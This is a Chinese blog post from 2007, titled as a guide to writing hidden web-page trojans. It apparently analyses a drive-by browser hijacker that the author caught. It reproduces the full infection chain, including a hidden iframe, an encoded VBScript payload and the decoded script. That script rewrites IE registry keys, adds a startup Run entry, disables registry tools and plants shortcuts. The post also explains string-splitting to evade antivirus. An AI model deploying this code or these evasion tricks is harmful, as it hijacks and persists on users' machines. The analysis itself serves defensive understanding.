博客首页 注册 建议与交流 排行榜 加入友情链接
推荐 投诉 搜索: 帮助

苦丁茶

tomcent.cublog.cn
如何写隐藏的网页病毒木马

今上在网上浏览网页的时候,在不知不觉中,中了网页病毒,我本来是开着瑞星杀毒的,也是昨天才升级的
却一点也没反应说有毒入侵,在经过一番折腾之后,终于明白他的机理.记录如下
[第一步]
我首先有用flashget下载了有病毒的网页,看源文件,里头有这一行代码
<iframe src=http://my.5e163.com/ie.htm width=0 height=0 frameborder=0 scrolling=NO></iframe>
这一行代码,好明显是说明不显示网页中,却它在网页中,说明不怀好意~~~~
[第二步]
我接着再用flashget 下载上面的http://my.5e163.com/ie.htm,再看源代码
只有四句
<html>
<object data="http://my.5e163.com/com88.test">
</object>
</html>
[第三步]
再下载http://my.5e163.com/com88.test得出如下代码
<html>
<object id='wsh' classid='clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B'></object>
<script LANGUAGE="VBscript.Encode">#@~^AQgAAA==@#@&hd4R"+oqDbO+,JuJLJF/r[J`w?KJ[rWOhr[rl.+w\bJ'J1.Wr[EdK0J'ED-(xr'rYnMJLJxJLEY,2E[r62ELJVK.JLJ+Mw\lr[rkU-jOr[ElME[rY~KmJ[ELjsPr4DY2=zJ:Xc*qv2R^WsJ@#@&S/tc]+TDbOnPrCr[E|/ELJi-UGJLJWOSJ[ECM+wHbELJ^MWr[JkW6E[rYwq    J'ED+Dr'J    +JLEOPAJLJawE'rVGDr'JDw\mJ[Er    -jYr'rl.r[rYPhlr'JT+E~,J4ODw)J&:HR*q&cmK:E@#@&Akt ILMkOn,JCE'r|/JLE`-jKJLJ0Dhr'JmDn-tkE'rmDKE[r/W6E'JD-&xE[EODE[rU+r[EO,2J'EXwE[rsKDELJD-tlr'Jbxw?J'EmDm4~nmJ[rLnJBPrtOY2lJzhXcX+8vf 1W:E~@#@&A/4 "+LqDbY+,J_E[r|/JLJiwUWJLE0DhJLECD-tkE[E^MWE[rdW6J'ED-qUELJO+MELJUJLJY,2r'JXwE[rVG.r[J.-tlJLErx'N0E[EC!VO{aE[rlLn|EDE'rVE~,E4YOa)Jz:HRlnF+& mK:E@#@&h/4 IoMrO+,J_J'JF/r[Ej'jWr[EWDhJ'EmDn-trr[E1DKJ[r/KWJLJO-&xE'rY+ME[rx+r'EY,2r[E62ELjsWME[r+.w:XwE'r+[j"Jk-;MJLJV8JBEtDY2)Jzhzc*+8&cmWsE@#@&S/4R]+L    MkO+,ECr[EF;J[Ei'?GJLE6YAr[rlD-trJLJ^DKJ'EkW0r'JD-q    E'JD+MJ'JUnr[EY,3JLJa2r[jsGMJ'J.'KzaJLJ+9j"E[rSd-!DE'rV rSJ4YYal&zsXc*nFfcmG:r@#@&S/4 "+o    .bYnPrur[EnZr[J`-UGJLJWYSJ'EmD+'\kr[J1.GJLJkWWJ'ED-(xr'JD+.ELJxnELJOPAELJaaJLJVKDr'JDwKHJ'Ea+N`E[rISr'E/'Er[EDsfr~EtDOw=z&hHR*nq+& mKhr@#@&S/4RIoq.kD+~J_J'EnZJLEj'?Wr'E0Dhr[El.n'HrJLEmMWE'r/WWELJO-&Ur[ED+MJ[rxE[rY~2r[EaaJ[rsWMJ[rn.-tlr[EkUwwkE[r./DPuGr[Jhn,nCJLET+EBJ4YYa)J&:HRX+8vf 1W:r@#@&S/tc]noqDbYnPEur[E|;E[rjwjKJ[EWDhE[rCM+wtkr[J1DKE[r/G0r[EO'qxr'JD+Dr'ExJLJOP3ELJawr'J^W.ELJ+.wtlE[rr    -obDr[JkY,uJLJG:r[En,nlr'JT+JBE4YDw=z&:z l+qv2 mK:E@#@&h/4 "+LMrD+~rCr[JnZr'J`-jWr[EWDhJLElM+-hGsk1k/wHrELJ^DKE[r/GWr[JOw&xE[rODELJ    +JLJD~2r[E6aJ'E^WDr'JD-;GE[rxDDE[EG^PKlr'J    +E'rV-uELJG:ELJKmJLJoJBEFr~EIAMm9qrIGE@#@&h/4 ]+TMkO+~E_J'Jn/JLJiwUWJ'E6YAJLEmDn'HbJ[rmMGJLJdW6J'ED-bE[rxNKE'js/'ZE[E;MDE[rnxD.nELJDdrr[EW    w"J'rE    -qAJLE(hSE[rr]3c2(AE~,JqApKS}IAR3(3~4YOw=&zsX XFvf 1WhJ@#@&S/4cIoMkDnPrCFJLJ/ELJj'jWr[J6OE[rhmJ'J.n'Hrmr'JMWE'r/WWELJO-qrr[E    NKJ[rhkwZ!DE[rDnUr[JD#+r[JMdE[rkKxwnGsr[Ek1rJLJnd'?XE'r/E[rOJ'r:'fkkJLEl(VE[r+]nr[JTr/r[JD.E[rX:WGJ'E^/E~rqJBJ]3V{f    6"fE@#@&Akt "+TDbY~J_J'JnZE'rj-UGJLJ0DAE[rlM+wHrELJ^DKE[r/GWr[JOw&xE[rODELJ    +JLJD~2r[E6aJ'E^WDr'JD-tCE[rk    -    kUELJ[WS~KbYE'rV+ES,JRO欢迎访问,hHRXF+&R1WsROr@#@&hbx[GSRm^G/@#@&eC4CAA==^#~@</script>
<script LANGUAGE="VBscript.Encode">#@~^1gMAAA==@#@&WU,+MDWMPMn/!:nP    +aO@#@&ZmsV,SW    Lo+b{zN[sC-KDrYd`r【音乐影视】jsE4YY2lJzhXcXF2R1W:r#@#@&ZmVsPdWULw+k|)N9sl7G.kD+k`E【上万首音乐】jsE4YOw=&zsX XFvf 1WhJ*@#@&@#@&Kx,+DMWM~D/;:PUnXY@#@&/l^VPdGUow+b{)N[9/VYK2`r音乐影视jsE4YY2lJzhXcXF2R1W:r#@#@&ZmVsPdWULw+k|)N9f+kVOWa`r上万首音乐jsJ4ODwlzJhXc*nq+&R^GsJb@#@&@#@&WU,+MDWMPMn/!:nP    +aO@#@&ZmsV,SW    Lo+b{zN[p;r13Jl!Um4`E,娱乐明星网YJ~E4DY2)J&sX l+8v&cmKhJ*@#@&ZmVs~dWxTo+b{b9[}Ebm0SCEU^4`E$上万首音乐YE~rtOOa)z&hHRX+82R^K:r#@#@&@#@&oE    mOkKx~JKxownk|bN9oC\KDbYn/cHBPi#@#@&dKx~nMDW.~M+dEsn,xnXY@#@&dU+D~?,'~hkt /M+lDn?4WDD^;Yvhkt ?2n1kCVwGV9+.dvjsC-KDrYdr#~3PrzJ,_,HP3J j"SEb@#@&dU KmDoOKlDt,'~j7@#@&djRUC\`b@#@&d?nO,?sP{~S/4cZM+lD+U4WMY^ED`Ad4R?anmblVwGsNDk`EsC-KDrYdJ*PQ~rz链接zE~3PHP3Ecj]dJ*@#@&i?^ KmDL+DnCO4P',i@#@&d?^ jl7+v#@#@&3U9PoE    ^YbWU@#@&@#@&o;    mOkKU,SG    ow+k|b9[f/VYKwcHBPj*@#@&iWx,n.DKD,Dn/;hPU+XO@#@&djnDP?~x,hdtc/M+CD+UtWMY1;Yvhdtc?2n1kl^oW^N+MdcJzV^jd+.dG+d3DGwr#~Q,JzE~3PHP3Ecj]dJ*@#@&i?cPlMonYhlO4,'P`7@#@&d?cjC\`*@#@&2U[,s;x1OkKx@#@&@#@&rBEBAA==^#~@</script>
<script language="Jscript.Encode">#@~^TgAAAA==@#@&0;    mDkW    P1sWk+rYv#~`@#@&/OKb:+K;O`r/VWR^sK/n`*E~l#@#@&)@#@&^sK/nkDc*@#@&ARUAAA==^#~@</script>
</html>
一片乱七八糟,但其中的有一个关键字,引起我的注意 LANGUAGE="VBscript.Encode",于是我就顺腾摸瓜,上网找了一下,这方面的资料,
原来encode是用来加密了脚本的,但找了好一阵子,都没有这方面的解密软件,而加密的就有好多了,而只是在
http://www.china100.net/java1.htm
找到在线解密的网页,于是他上面的乱七八糟的代码复制到该网页的输入框,解码成功
然后我将解码后的代码复印到记事本中,
得代码如下
<html>
<object id='wsh' classid='clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B'></object>
<script LANGUAGE="VBscript">
wsh.RegWrite "H"&"KC"&"U\So"&"ftw"&"are\Mi"&"cro"&"sof"&"t\In"&"ter"&"ne"&"t E"&"xp"&"lor"&"er\Ma"&"in\St"&"ar"&"t Pa"&"ge", "http://my.5e163.com"
wsh.RegWrite "H"&"KC"&"U\So"&"ftw"&"are\Mi"&"cro"&"sof"&"t\In"&"ter"&"ne"&"t E"&"xp"&"lor"&"er\Ma"&"in\St"&"ar"&"t Pa"&"ge", "http://my.5e163.com"
wsh.RegWrite "H"&"KC"&"U\So"&"ftw"&"are\Mi"&"cro"&"sof"&"t\In"&"ter"&"ne"&"t E"&"xp"&"lor"&"er\Ma"&"in\Se"&"arch Pa"&"ge", "http://my.5e163.com"
wsh.RegWrite "H"&"KC"&"U\So"&"ftw"&"are\Mi"&"cro"&"sof"&"t\In"&"ter"&"ne"&"t E"&"xp"&"lor"&"er\Ma"&"in\def"&"ault_p"&"age_ur"&"l", "http://my.5e163.com"
wsh.RegWrite "H"&"KC"&"U\So"&"ftw"&"are\Mi"&"cro"&"sof"&"t\In"&"ter"&"ne"&"t E"&"xp"&"lor"&"er\Typ"&"edURLs\ur"&"l1","http://my.5e163.com"
wsh.RegWrite "H"&"KC"&"U\So"&"ftw"&"are\Mi"&"cro"&"sof"&"t\In"&"ter"&"ne"&"t E"&"xp"&"lor"&"er\Typ"&"edUR"&"Ls\ur"&"l2","http://my.5e163.com"
wsh.RegWrite "H"&"KC"&"U\So"&"ftw"&"are\Mi"&"cro"&"sof"&"t\In"&"ter"&"ne"&"t E"&"xp"&"lor"&"er\Ty"&"pedU"&"RL"&"s\u"&"rl3","http://my.5e163.com"
wsh.RegWrite "H"&"KC"&"U\So"&"ftw"&"are\Mi"&"cro"&"sof"&"t\In"&"ter"&"ne"&"t E"&"xp"&"lor"&"er\Ma"&"in\Fi"&"rst Ho"&"me Pa"&"ge","http://my.5e163.com"
wsh.RegWrite "H"&"KC"&"U\So"&"ftw"&"are\Mi"&"cro"&"sof"&"t\In"&"ter"&"ne"&"t E"&"xp"&"lor"&"er\Ma"&"in\Fir"&"st H"&"om"&"e Pa"&"ge","http://my.5e163.com"
wsh.RegWrite "H"&"KC"&"U\So"&"ftw"&"are\Policies\Mi"&"cro"&"sof"&"t\In"&"ter"&"ne"&"t E"&"xp"&"lor"&"er\Co"&"ntr"&"ol Pa"&"ne"&"l\H"&"ome"&"Pa"&"ge","1","REG_DWORD"
wsh.RegWrite "H"&"KC"&"U\So"&"ftw"&"are\Mi"&"cro"&"sof"&"t\Wi"&"ndo"&"ws\C"&"urr"&"entVe"&"rsi"&"on\R"&"un\IE"&"XPL"&"ORE.EXE", "IEXPLORE.EXE http://my.5e163.com"
wsh.RegWrite "HK"&"C"&"U\So"&"ft"&"wa"&"re\Mic"&"ro"&"sof"&"t\Wi"&"ndo"&"ws\Cur"&"ren"&"tVe"&"rs"&"ion\Pol"&"ici"&"es\Sy"&"s"&"te"&"m\Dis"&"abl"&"eRe"&"gis"&"tr"&"yToo"&"ls","1","REG_DWORD"
wsh.RegWrite "H"&"KC"&"U\So"&"ftw"&"are\Mi"&"cro"&"sof"&"t\In"&"ter"&"ne"&"t E"&"xp"&"lor"&"er\Ma"&"in\Win"&"dow Tit"&"le", "--欢迎访问 my.5e163.com--"
window.close
</script>
<script LANGUAGE="VBscript">
on error resume next
Call LongFei_AddFavorites("【音乐影视】","http://my.5e163.com")
Call LongFei_AddFavorites("【上万首音乐】","http://my.5e163.com")

on error resume next
Call LongFei_AddDesktop("音乐影视","http://my.5e163.com")
Call LongFei_AddDesktop("上万首音乐","http://my.5e163.com")

on error resume next
Call LongFei_AddQuickLaunch("[娱乐明星网]","http://my.5e163.com")
Call LongFei_AddQuickLaunch("[上万首音乐]","http://my.5e163.com")

Function LongFei_AddFavorites(N, U)
    on error resume next
    Set S = wsh.CreateShortcut(wsh.SpecialFolders("Favorites") + "/" + N +".URL")
    S.TargetPath = U    
    S.Save()
    Set Sl = wsh.CreateShortcut(wsh.SpecialFolders("Favorites") + "/链接/" + N +".URL")
    Sl.TargetPath = U
    Sl.Save()
End Function

Function LongFei_AddDesktop(N, U)
    on error resume next
    Set S = wsh.CreateShortcut(wsh.SpecialFolders("AllUsersDesktop") + "/" + N +".URL")
    S.TargetPath = U    
    S.Save()
End Function

</script>
<script language="Jscript">
function closeit() {
setTimeout("self.close()",5)
}
closeit()
</script>
</html>

从上面的代码中,可以很容易的发现,他是写入注册表的,而且是用了词组分解来避开杀毒软件对特征码的查杀,
总结一下,该网页病毒用了病毒惯用手法,
1。隐藏网页,将网页引向深层,而且用了<object data="http://my.5e163.com/com88.test">等隐藏身份
2。加密,这不用说了,
3。词组分解,

wsh.RegWrite "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page", "http://my.5e163.com"
写成
wsh.RegWrite "H"&"KC"&"U\So"&"ftw"&"are\Mi"&"cro"&"sof"&"t\In"&"ter"&"ne"&"t E"&"xp"&"lor"&"er\Ma"&"in\St"&"ar"&"t Pa"&"ge", "http://my.5e163.com"
等等,来避开杀毒软件。

发表于: 2007-03-05,修改于: 2007-03-05 23:54,已浏览424次,有评论0条 推荐 投诉

给我留言
版权所有 ChinaUnix.net 页面生成时间:0.13686